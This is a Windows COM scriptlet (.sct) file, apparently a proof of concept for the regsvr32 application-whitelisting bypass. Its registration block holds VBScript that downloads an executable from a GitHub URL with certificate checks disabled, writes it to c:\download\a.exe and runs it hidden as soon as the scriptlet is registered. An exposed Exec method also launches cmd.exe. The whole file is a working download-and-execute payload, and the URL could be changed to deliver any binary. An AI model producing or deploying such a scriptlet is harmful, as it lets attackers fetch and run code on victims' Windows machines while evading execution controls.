<?XML version="1.0"?>
<scriptlet>

<registration
    description="Test"
    progid="Test"
    version="1.00"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}"
	>
	
	<script language="VBScript">
		<![CDATA[
	
			Const adTypeBinary = 1
			Const adSaveCreateOverWrite = 2
			Dim http,ado
			Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
			http.SetOption 2, 13056
			http.open "GET","https://github.com/3gstudent/test/raw/master/putty.exe",False
			http.send
			Set ado = createobject("Adodb.Stream")
			ado.Type = adTypeBinary
			ado.Open
			ado.Write http.responseBody
			ado.SaveToFile "c:\download\a.exe"
			ado.Close
			WScript.CreateObject("WScript.Shell").Run "c:\download\a.exe",0,true 
	
		]]>
</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
	
	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
	}
	
]]>
</script>

</scriptlet>
